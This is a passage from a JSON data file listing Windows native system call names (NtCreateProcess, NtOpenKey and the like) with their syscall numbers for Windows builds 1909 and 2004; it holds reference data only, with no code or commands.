"NtCreateDirectoryObjectEx": "163", "NtCreateEnclave": "164", "NtCreateEnlistment": "165", "NtCreateEventPair": "166", "NtCreateIRTimer": "167", "NtCreateIoCompletion": "168", "NtCreateJobObject": "169", "NtCreateJobSet": "170", "NtCreateKeyTransacted": "171", "NtCreateKeyedEvent": "172", "NtCreateLowBoxToken": "173", "NtCreateMailslotFile": "174", "NtCreateMutant": "175", "NtCreateNamedPipeFile": "176", "NtCreatePagingFile": "177", "NtCreatePartition": "178", "NtCreatePort": "179", "NtCreatePrivateNamespace": "180", "NtCreateProcess": "181", "NtCreateProfile": "182", "NtCreateProfileEx": "183", "NtCreateRegistryTransaction": "184", "NtCreateResourceManager": "185", "NtCreateSectionEx": "186", "NtCreateSemaphore": "187", "NtCreateSymbolicLinkObject": "188", "NtCreateThreadEx": "189", "NtCreateTimer": "190", "NtCreateTimer2": "191", "NtCreateToken": "192", "NtCreateTokenEx": "193", "NtCreateTransaction": "194", "NtCreateTransactionManager": "195", "NtCreateUserProcess": "196", "NtCreateWaitCompletionPacket": "197", "NtCreateWaitablePort": "198", "NtCreateWnfStateName": "199", "NtCreateWorkerFactory": "200", "NtDebugActiveProcess": "201", "NtDebugContinue": "202", "NtDeleteAtom": "203", "NtDeleteBootEntry": "204", "NtDeleteDriverEntry": "205", "NtDeleteFile": "206", "NtDeleteKey": "207", "NtDeleteObjectAuditAlarm": "208", "NtDeletePrivateNamespace": "209", "NtDeleteValueKey": "210", "NtDeleteWnfStateData": "211", "NtDeleteWnfStateName": "212", "NtDisableLastKnownGood": "213", "NtDisplayString": "214", "NtDrawText": "215", "NtEnableLastKnownGood": "216", "NtEnumerateBootEntries": "217", "NtEnumerateDriverEntries": "218", "NtEnumerateSystemEnvironmentValuesEx": "219", "NtEnumerateTransactionObject": "220", "NtExtendSection": "221", "NtFilterBootOption": "222", "NtFilterToken": "223", "NtFilterTokenEx": "224", "NtFlushBuffersFileEx": "225", "NtFlushInstallUILanguage": "226", "NtFlushInstructionCache": "227", "NtFlushKey": "228", "NtFlushProcessWriteBuffers": "229", "NtFlushVirtualMemory": "230", "NtFlushWriteBuffer": "231", "NtFreeUserPhysicalPages": "232", "NtFreezeRegistry": "233", "NtFreezeTransactions": "234", "NtGetCachedSigningLevel": "235", "NtGetCompleteWnfStateSubscription": "236", "NtGetContextThread": "237", "NtGetCurrentProcessorNumber": "238", "NtGetCurrentProcessorNumberEx": "239", "NtGetDevicePowerState": "240", "NtGetMUIRegistryInfo": "241", "NtGetNextProcess": "242", "NtGetNextThread": "243", "NtGetNlsSectionPtr": "244", "NtGetNotificationResourceManager": "245", "NtGetWriteWatch": "246", "NtImpersonateAnonymousToken": "247", "NtImpersonateThread": "248", "NtInitializeEnclave": "249", "NtInitializeNlsFiles": "250", "NtInitializeRegistry": "251", "NtInitiatePowerAction": "252", "NtIsSystemResumeAutomatic": "253", "NtIsUILanguageComitted": "254", "NtListenPort": "255", "NtLoadDriver": "256", "NtLoadEnclaveData": "257", "NtLoadKey": "258", "NtLoadKey2": "259", "NtLoadKeyEx": "260", "NtLockFile": "261", "NtLockProductActivationKeys": "262", "NtLockRegistryKey": "263", "NtLockVirtualMemory": "264", "NtMakePermanentObject": "265", "NtMakeTemporaryObject": "266", "NtManageHotPatch": "267", "NtManagePartition": "268", "NtMapCMFModule": "269", "NtMapUserPhysicalPages": "270", "NtMapViewOfSectionEx": "271", "NtModifyBootEntry": "272", "NtModifyDriverEntry": "273", "NtNotifyChangeDirectoryFile": "274", "NtNotifyChangeDirectoryFileEx": "275", "NtNotifyChangeKey": "276", "NtNotifyChangeMultipleKeys": "277", "NtNotifyChangeSession": "278", "NtOpenEnlistment": "279", "NtOpenEventPair": "280", "NtOpenIoCompletion": "281", "NtOpenJobObject": "282", "NtOpenKeyEx": "283", "NtOpenKeyTransacted": "284", "NtOpenKeyTransactedEx": "285", "NtOpenKeyedEvent": "286", "NtOpenMutant": "287", "NtOpenObjectAuditAlarm": "288", "NtOpenPartition": "289", "NtOpenPrivateNamespace": "290", "NtOpenProcessToken": "291", "NtOpenRegistryTransaction": "292", "NtOpenResourceManager": "293", "NtOpenSemaphore": "294", "NtOpenSession": "295", "NtOpenSymbolicLinkObject": "296", "NtOpenThread": "297", "NtOpenTimer": "298", "NtOpenTransaction": "299", "NtOpenTransactionManager": "300", "NtPlugPlayControl": "301", "NtPrePrepareComplete": "302", "NtPrePrepareEnlistment": "303", "NtPrepareComplete": "304", "NtPrepareEnlistment": "305", "NtPrivilegeCheck": "306", "NtPrivilegeObjectAuditAlarm": "307", "NtPrivilegedServiceAuditAlarm": "308", "NtPropagationComplete": "309", "NtPropagationFailed": "310", "NtPulseEvent": "311", "NtQueryAuxiliaryCounterFrequency": "312", "NtQueryBootEntryOrder": "313", "NtQueryBootOptions": "314", "NtQueryDebugFilterState": "315", "NtQueryDirectoryFileEx": "316", "NtQueryDirectoryObject": "317", "NtQueryDriverEntryOrder": "318", "NtQueryEaFile": "319", "NtQueryFullAttributesFile": "320", "NtQueryInformationAtom": "321", "NtQueryInformationByName": "322", "NtQueryInformationEnlistment": "323", "NtQueryInformationJobObject": "324", "NtQueryInformationPort": "325", "NtQueryInformationResourceManager": "326", "NtQueryInformationTransaction": "327", "NtQueryInformationTransactionManager": "328", "NtQueryInformationWorkerFactory": "329", "NtQueryInstallUILanguage": "330", "NtQueryIntervalProfile": "331", "NtQueryIoCompletion": "332", "NtQueryLicenseValue": "333", "NtQueryMultipleValueKey": "334", "NtQueryMutant": "335", "NtQueryOpenSubKeys": "336", "NtQueryOpenSubKeysEx": "337", "NtQueryPortInformationProcess": "338", "NtQueryQuotaInformationFile": "339", "NtQuerySecurityAttributesToken": "340", "NtQuerySecurityObject": "341", "NtQuerySecurityPolicy": "342", "NtQuerySemaphore": "343", "NtQuerySymbolicLinkObject": "344", "NtQuerySystemEnvironmentValue": "345", "NtQuerySystemEnvironmentValueEx": "346", "NtQuerySystemInformationEx": "347", "NtQueryTimerResolution": "348", "NtQueryWnfStateData": "349", "NtQueryWnfStateNameInformation": "350", "NtQueueApcThreadEx": "351", "NtRaiseException": "352", "NtRaiseHardError": "353", "NtReadOnlyEnlistment": "354", "NtRecoverEnlistment": "355", "NtRecoverResourceManager": "356", "NtRecoverTransactionManager": "357", "NtRegisterProtocolAddressInformation": "358", "NtRegisterThreadTerminatePort": "359", "NtReleaseKeyedEvent": "360", "NtReleaseWorkerFactoryWorker": "361", "NtRemoveIoCompletionEx": "362", "NtRemoveProcessDebug": "363", "NtRenameKey": "364", "NtRenameTransactionManager": "365", "NtReplaceKey": "366", "NtReplacePartitionUnit": "367", "NtReplyWaitReplyPort": "368", "NtRequestPort": "369", "NtResetEvent": "370", "NtResetWriteWatch": "371", "NtRestoreKey": "372", "NtResumeProcess": "373", "NtRevertContainerImpersonation": "374", "NtRollbackComplete": "375", "NtRollbackEnlistment": "376", "NtRollbackRegistryTransaction": "377", "NtRollbackTransaction": "378", "NtRollforwardTransactionManager": "379", "NtSaveKey": "380", "NtSaveKeyEx": "381", "NtSaveMergedKeys": "382", "NtSecureConnectPort": "383", "NtSerializeBoot": "384", "NtSetBootEntryOrder": "385", "NtSetBootOptions": "386", "NtSetCachedSigningLevel": "387", "NtSetCachedSigningLevel2": "388", "NtSetContextThread": "389", "NtSetDebugFilterState": "390", "NtSetDefaultHardErrorPort": "391", "NtSetDefaultLocale": "392", "NtSetDefaultUILanguage": "393", "NtSetDriverEntryOrder": "394", "NtSetEaFile": "395", "NtSetHighEventPair": "396", "NtSetHighWaitLowEventPair": "397", "NtSetIRTimer": "398", "NtSetInformationDebugObject": "399", "NtSetInformationEnlistment": "400", "NtSetInformationJobObject": "401", "NtSetInformationKey": "402", "NtSetInformationResourceManager": "403", "NtSetInformationSymbolicLink": "404", "NtSetInformationToken": "405", "NtSetInformationTransaction": "406", "NtSetInformationTransactionManager": "407", "NtSetInformationVirtualMemory": "408", "NtSetInformationWorkerFactory": "409", "NtSetIntervalProfile": "410", "NtSetIoCompletion": "411", "NtSetIoCompletionEx": "412", "NtSetLdtEntries": "413", "NtSetLowEventPair": "414", "NtSetLowWaitHighEventPair": "415", "NtSetQuotaInformationFile": "416", "NtSetSecurityObject": "417", "NtSetSystemEnvironmentValue": "418", "NtSetSystemEnvironmentValueEx": "419", "NtSetSystemInformation": "420", "NtSetSystemPowerState": "421", "NtSetSystemTime": "422", "NtSetThreadExecutionState": "423", "NtSetTimer2": "424", "NtSetTimerEx": "425", "NtSetTimerResolution": "426", "NtSetUuidSeed": "427", "NtSetVolumeInformationFile": "428", "NtSetWnfProcessNotificationEvent": "429", "NtShutdownSystem": "430", "NtShutdownWorkerFactory": "431", "NtSignalAndWaitForSingleObject": "432", "NtSinglePhaseReject": "433", "NtStartProfile": "434", "NtStopProfile": "435", "NtSubscribeWnfStateChange": "436", "NtSuspendProcess": "437", "NtSuspendThread": "438", "NtSystemDebugControl": "439", "NtTerminateEnclave": "440", "NtTerminateJobObject": "441", "NtTestAlert": "442", "NtThawRegistry": "443", "NtThawTransactions": "444", "NtTraceControl": "445", "NtTranslateFilePath": "446", "NtUmsThreadYield": "447", "NtUnloadDriver": "448", "NtUnloadKey": "449", "NtUnloadKey2": "450", "NtUnloadKeyEx": "451", "NtUnlockFile": "452", "NtUnlockVirtualMemory": "453", "NtUnmapViewOfSectionEx": "454", "NtUnsubscribeWnfStateChange": "455", "NtUpdateWnfStateData": "456", "NtVdmControl": "457", "NtWaitForAlertByThreadId": "458", "NtWaitForDebugEvent": "459", "NtWaitForKeyedEvent": "460", "NtWaitForWorkViaWorkerFactory": "461", "NtWaitHighEventPair": "462", "NtWaitLowEventPair": "463"}, "1909": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireProcessActivityReference": "103", "NtAddAtomEx": "104", "NtAddBootEntry": "105", "NtAddDriverEntry": "106", "NtAdjustGroupsToken": "107", "NtAdjustTokenClaimsAndDeviceGroups": "108", "NtAlertResumeThread": "109", "NtAlertThread": "110", "NtAlertThreadByThreadId": "111", "NtAllocateLocallyUniqueId": "112", "NtAllocateReserveObject": "113", "NtAllocateUserPhysicalPages": "114", "NtAllocateUuids": "115", "NtAllocateVirtualMemoryEx": "116", "NtAlpcAcceptConnectPort": "117", "NtAlpcCancelMessage": "118", "NtAlpcConnectPort": "119", "NtAlpcConnectPortEx": "120", "NtAlpcCreatePort": "121", "NtAlpcCreatePortSection": "122", "NtAlpcCreateResourceReserve": "123", "NtAlpcCreateSectionView": "124", "NtAlpcCreateSecurityContext": "125", "NtAlpcDeletePortSection": "126", "NtAlpcDeleteResourceReserve": "127", "NtAlpcDeleteSectionView": "128", "NtAlpcDeleteSecurityContext": "129", "NtAlpcDisconnectPort": "130", "NtAlpcImpersonateClientContainerOfPort": "131", "NtAlpcImpersonateClientOfPort": "132", "NtAlpcOpenSenderProcess": "133", "NtAlpcOpenSenderThread": "134", "NtAlpcQueryInformation": "135", "NtAlpcQueryInformationMessage": "136", "NtAlpcRevokeSecurityContext": "137", "NtAlpcSendWaitReceivePort": "138", "NtAlpcSetInformation": "139", "NtAreMappedFilesTheSame": "140", "NtAssignProcessToJobObject": "141", "NtAssociateWaitCompletionPacket": "142", "NtCallEnclave": "143", "NtCancelIoFileEx": "144", "NtCancelSynchronousIoFile": "145", "NtCancelTimer2": "146", "NtCancelWaitCompletionPacket": "147", "NtCommitComplete": "148", "NtCommitEnlistment": "149", "NtCommitRegistryTransaction": "150", "NtCommitTransaction": "151", "NtCompactKeys": "152", "NtCompareObjects": "153", "NtCompareSigningLevels": "154", "NtCompareTokens": "155", "NtCompleteConnectPort": "156", "NtCompressKey": "157", "NtConnectPort": "158", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "159", "NtCreateCrossVmEvent": "160", "NtCreateDebugObject": "161", "NtCreateDirectoryObject": "162", "NtCreateDirectoryObjectEx": "163", "NtCreateEnclave": "164", "NtCreateEnlistment": "165", "NtCreateEventPair": "166", "NtCreateIRTimer": "167", "NtCreateIoCompletion": "168", "NtCreateJobObject": "169", "NtCreateJobSet": "170", "NtCreateKeyTransacted": "171", "NtCreateKeyedEvent": "172", "NtCreateLowBoxToken": "173", "NtCreateMailslotFile": "174", "NtCreateMutant": "175", "NtCreateNamedPipeFile": "176", "NtCreatePagingFile": "177", "NtCreatePartition": "178", "NtCreatePort": "179", "NtCreatePrivateNamespace": "180", "NtCreateProcess": "181", "NtCreateProfile": "182", "NtCreateProfileEx": "183", "NtCreateRegistryTransaction": "184", "NtCreateResourceManager": "185", "NtCreateSectionEx": "186", "NtCreateSemaphore": "187", "NtCreateSymbolicLinkObject": "188", "NtCreateThreadEx": "189", "NtCreateTimer": "190", "NtCreateTimer2": "191", "NtCreateToken": "192", "NtCreateTokenEx": "193", "NtCreateTransaction": "194", "NtCreateTransactionManager": "195", "NtCreateUserProcess": "196", "NtCreateWaitCompletionPacket": "197", "NtCreateWaitablePort": "198", "NtCreateWnfStateName": "199", "NtCreateWorkerFactory": "200", "NtDebugActiveProcess": "201", "NtDebugContinue": "202", "NtDeleteAtom": "203", "NtDeleteBootEntry": "204", "NtDeleteDriverEntry": "205", "NtDeleteFile": "206", "NtDeleteKey": "207", "NtDeleteObjectAuditAlarm": "208", "NtDeletePrivateNamespace": "209", "NtDeleteValueKey": "210", "NtDeleteWnfStateData": "211", "NtDeleteWnfStateName": "212", "NtDisableLastKnownGood": "213", "NtDisplayString": "214", "NtDrawText": "215", "NtEnableLastKnownGood": "216", "NtEnumerateBootEntries": "217", "NtEnumerateDriverEntries": "218", "NtEnumerateSystemEnvironmentValuesEx": "219", "NtEnumerateTransactionObject": "220", "NtExtendSection": "221", "NtFilterBootOption": "222", "NtFilterToken": "223", "NtFilterTokenEx": "224", "NtFlushBuffersFileEx": "225", "NtFlushInstallUILanguage": "226", "NtFlushInstructionCache": "227", "NtFlushKey": "228", "NtFlushProcessWriteBuffers": "229", "NtFlushVirtualMemory": "230", "NtFlushWriteBuffer": "231", "NtFreeUserPhysicalPages": "232", "NtFreezeRegistry": "233", "NtFreezeTransactions": "234", "NtGetCachedSigningLevel": "235", "NtGetCompleteWnfStateSubscription": "236", "NtGetContextThread": "237", "NtGetCurrentProcessorNumber": "238", "NtGetCurrentProcessorNumberEx": "239", "NtGetDevicePowerState": "240", "NtGetMUIRegistryInfo": "241", "NtGetNextProcess": "242", "NtGetNextThread": "243", "NtGetNlsSectionPtr": "244", "NtGetNotificationResourceManager": "245", "NtGetWriteWatch": "246", "NtImpersonateAnonymousToken": "247", "NtImpersonateThread": "248", "NtInitializeEnclave": "249", "NtInitializeNlsFiles": "250", "NtInitializeRegistry": "251", "NtInitiatePowerAction": "252", "NtIsSystemResumeAutomatic": "253", "NtIsUILanguageComitted": "254", "NtListenPort": "255", "NtLoadDriver": "256", "NtLoadEnclaveData": "257", "NtLoadKey": "258", "NtLoadKey2": "259", "NtLoadKeyEx": "260", "NtLockFile": "261", "NtLockProductActivationKeys": "262", "NtLockRegistryKey": "263", "NtLockVirtualMemory": "264", "NtMakePermanentObject": "265", "NtMakeTemporaryObject": "266", "NtManageHotPatch": "267", "NtManagePartition": "268", "NtMapCMFModule": "269", "NtMapUserPhysicalPages": "270", "NtMapViewOfSectionEx": "271", "NtModifyBootEntry": "272", "NtModifyDriverEntry": "273", "NtNotifyChangeDirectoryFile": "274", "NtNotifyChangeDirectoryFileEx": "275", "NtNotifyChangeKey": "276", "NtNotifyChangeMultipleKeys": "277", "NtNotifyChangeSession": "278", "NtOpenEnlistment": "279", "NtOpenEventPair": "280", "NtOpenIoCompletion": "281", "NtOpenJobObject": "282", "NtOpenKeyEx": "283", "NtOpenKeyTransacted": "284", "NtOpenKeyTransactedEx": "285", "NtOpenKeyedEvent": "286", "NtOpenMutant": "287", "NtOpenObjectAuditAlarm": "288", "NtOpenPartition": "289", "NtOpenPrivateNamespace": "290", "NtOpenProcessToken": "291", "NtOpenRegistryTransaction": "292", "NtOpenResourceManager": "293", "NtOpenSemaphore": "294", "NtOpenSession": "295", "NtOpenSymbolicLinkObject": "296", "NtOpenThread": "297", "NtOpenTimer": "298", "NtOpenTransaction": "299", "NtOpenTransactionManager": "300", "NtPlugPlayControl": "301", "NtPrePrepareComplete": "302", "NtPrePrepareEnlistment": "303", "NtPrepareComplete": "304", "NtPrepareEnlistment": "305", "NtPrivilegeCheck": "306", "NtPrivilegeObjectAuditAlarm": "307", "NtPrivilegedServiceAuditAlarm": "308", "NtPropagationComplete": "309", "NtPropagationFailed": "310", "NtPulseEvent": "311", "NtQueryAuxiliaryCounterFrequency": "312", "NtQueryBootEntryOrder": "313", "NtQueryBootOptions": "314", "NtQueryDebugFilterState": "315", "NtQueryDirectoryFileEx": "316", "NtQueryDirectoryObject": "317", "NtQueryDriverEntryOrder": "318", "NtQueryEaFile": "319", "NtQueryFullAttributesFile": "320", "NtQueryInformationAtom": "321", "NtQueryInformationByName": "322", "NtQueryInformationEnlistment": "323", "NtQueryInformationJobObject": "324", "NtQueryInformationPort": "325", "NtQueryInformationResourceManager": "326", "NtQueryInformationTransaction": "327", "NtQueryInformationTransactionManager": "328", "NtQueryInformationWorkerFactory": "329", "NtQueryInstallUILanguage": "330", "NtQueryIntervalProfile": "331", "NtQueryIoCompletion": "332", "NtQueryLicenseValue": "333", "NtQueryMultipleValueKey": "334", "NtQueryMutant": "335", "NtQueryOpenSubKeys": "336", "NtQueryOpenSubKeysEx": "337", "NtQueryPortInformationProcess": "338", "NtQueryQuotaInformationFile": "339", "NtQuerySecurityAttributesToken": "340", "NtQuerySecurityObject": "341", "NtQuerySecurityPolicy": "342", "NtQuerySemaphore": "343", "NtQuerySymbolicLinkObject": "344", "NtQuerySystemEnvironmentValue": "345", "NtQuerySystemEnvironmentValueEx": "346", "NtQuerySystemInformationEx": "347", "NtQueryTimerResolution": "348", "NtQueryWnfStateData": "349", "NtQueryWnfStateNameInformation": "350", "NtQueueApcThreadEx": "351", "NtRaiseException": "352", "NtRaiseHardError": "353", "NtReadOnlyEnlistment": "354", "NtRecoverEnlistment": "355", "NtRecoverResourceManager": "356", "NtRecoverTransactionManager": "357", "NtRegisterProtocolAddressInformation": "358", "NtRegisterThreadTerminatePort": "359", "NtReleaseKeyedEvent": "360", "NtReleaseWorkerFactoryWorker": "361", "NtRemoveIoCompletionEx": "362", "NtRemoveProcessDebug": "363", "NtRenameKey": "364", "NtRenameTransactionManager": "365", "NtReplaceKey": "366", "NtReplacePartitionUnit": "367", "NtReplyWaitReplyPort": "368", "NtRequestPort": "369", "NtResetEvent": "370", "NtResetWriteWatch": "371", "NtRestoreKey": "372", "NtResumeProcess": "373", "NtRevertContainerImpersonation": "374", "NtRollbackComplete": "375", "NtRollbackEnlistment": "376", "NtRollbackRegistryTransaction": "377", "NtRollbackTransaction": "378", "NtRollforwardTransactionManager": "379", "NtSaveKey": "380", "NtSaveKeyEx": "381", "NtSaveMergedKeys": "382", "NtSecureConnectPort": "383", "NtSerializeBoot": "384", "NtSetBootEntryOrder": "385", "NtSetBootOptions": "386", "NtSetCachedSigningLevel": "387", "NtSetCachedSigningLevel2": "388", "NtSetContextThread": "389", "NtSetDebugFilterState": "390", "NtSetDefaultHardErrorPort": "391", "NtSetDefaultLocale": "392", "NtSetDefaultUILanguage": "393", "NtSetDriverEntryOrder": "394", "NtSetEaFile": "395", "NtSetHighEventPair": "396", "NtSetHighWaitLowEventPair": "397", "NtSetIRTimer": "398", "NtSetInformationDebugObject": "399", "NtSetInformationEnlistment": "400", "NtSetInformationJobObject": "401", "NtSetInformationKey": "402", "NtSetInformationResourceManager": "403", "NtSetInformationSymbolicLink": "404", "NtSetInformationToken": "405", "NtSetInformationTransaction": "406", "NtSetInformationTransactionManager": "407", "NtSetInformationVirtualMemory": "408", "NtSetInformationWorkerFactory": "409", "NtSetIntervalProfile": "410", "NtSetIoCompletion": "411", "NtSetIoCompletionEx": "412", "NtSetLdtEntries": "413", "NtSetLowEventPair": "414", "NtSetLowWaitHighEventPair": "415", "NtSetQuotaInformationFile": "416", "NtSetSecurityObject": "417", "NtSetSystemEnvironmentValue": "418", "NtSetSystemEnvironmentValueEx": "419", "NtSetSystemInformation": "420", "NtSetSystemPowerState": "421", "NtSetSystemTime": "422", "NtSetThreadExecutionState": "423", "NtSetTimer2": "424", "NtSetTimerEx": "425", "NtSetTimerResolution": "426", "NtSetUuidSeed": "427", "NtSetVolumeInformationFile": "428", "NtSetWnfProcessNotificationEvent": "429", "NtShutdownSystem": "430", "NtShutdownWorkerFactory": "431", "NtSignalAndWaitForSingleObject": "432", "NtSinglePhaseReject": "433", "NtStartProfile": "434", "NtStopProfile": "435", "NtSubscribeWnfStateChange": "436", "NtSuspendProcess": "437", "NtSuspendThread": "438", "NtSystemDebugControl": "439", "NtTerminateEnclave": "440", "NtTerminateJobObject": "441", "NtTestAlert": "442", "NtThawRegistry": "443", "NtThawTransactions": "444", "NtTraceControl": "445", "NtTranslateFilePath": "446", "NtUmsThreadYield": "447", "NtUnloadDriver": "448", "NtUnloadKey": "449", "NtUnloadKey2": "450", "NtUnloadKeyEx": "451", "NtUnlockFile": "452", "NtUnlockVirtualMemory": "453", "NtUnmapViewOfSectionEx": "454", "NtUnsubscribeWnfStateChange": "455", "NtUpdateWnfStateData": "456", "NtVdmControl": "457", "NtWaitForAlertByThreadId": "458", "NtWaitForDebugEvent": "459", "NtWaitForKeyedEvent": "460", "NtWaitForWorkViaWorkerFactory": "461", "NtWaitHighEventPair": "462", "NtWaitLowEventPair": "463"}, "2004": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireCrossVmMutant": "103", "NtAcquireProcessActivityReference": "104", "NtAddAtomEx": "105", "NtAddBootEntry": "106", "NtAddDriverEntry": "107", "NtAdjustGroupsToken": "108", "NtAdjustTokenClaimsAndDeviceGroups": "109", "NtAlertResumeThread": "110", "NtAlertThread": "111", "NtAlertThreadByThreadId": "112", "NtAllocateLocallyUniqueId": "113", "NtAllocateReserveObject": "114", "NtAllocateUserPhysicalPages": "115", "NtAllocateUserPhysicalPagesEx": "116", "NtAllocateUuids": "117", "NtAllocateVirtualMemoryEx": "118", "NtAlpcAcceptConnectPort": "119", "NtAlpcCancelMessage": "120", "NtAlpcConnectPort": "121", "NtAlpcConnectPortEx": "122", "NtAlpcCreatePort": "123", "NtAlpcCreatePortSection": "124", "NtAlpcCreateResourceReserve": "125", "NtAlpcCreateSectionView": "126", "NtAlpcCreateSecurityContext": "127", "NtAlpcDeletePortSection": "128", "NtAlpcDeleteResourceReserve": "129", "NtAlpcDeleteSectionView": "130", "NtAlpcDeleteSecurityContext": "131", "NtAlpcDisconnectPort": "132", "NtAlpcImpersonateClientContainerOfPort": "133", "NtAlpcImpersonateClientOfPort": "134", "NtAlpcOpenSenderProcess": "135", "NtAlpcOpenSenderThread": "136", "NtAlpcQueryInformation": "137", "NtAlpcQueryInformationMessage": "138", "NtAlpcRevokeSecurityContext": "139", "NtAlpcSendWaitReceivePort": "140", "NtAlpcSetInformation": "141", "NtAreMappedFilesTheSame": "142", "NtAssignProcessToJobObject": "143", "NtAssociateWaitCompletionPacket": "144", "NtCallEnclave": "145", "NtCancelIoFileEx": "146", "NtCancelSynchronousIoFile": "147", "NtCancelTimer2": "148", "NtCancelWaitCompletionPacket": "149", "NtCommitComplete": "150", "NtCommitEnlistment": "151", "NtCommitRegistryTransaction": "152", "NtCommitTransaction": "153", "NtCompactKeys": "154", "NtCompareObjects": "155", "NtCompareSigningLevels": "156", "NtCompareTokens": "157", "NtCompleteConnectPort": "158", 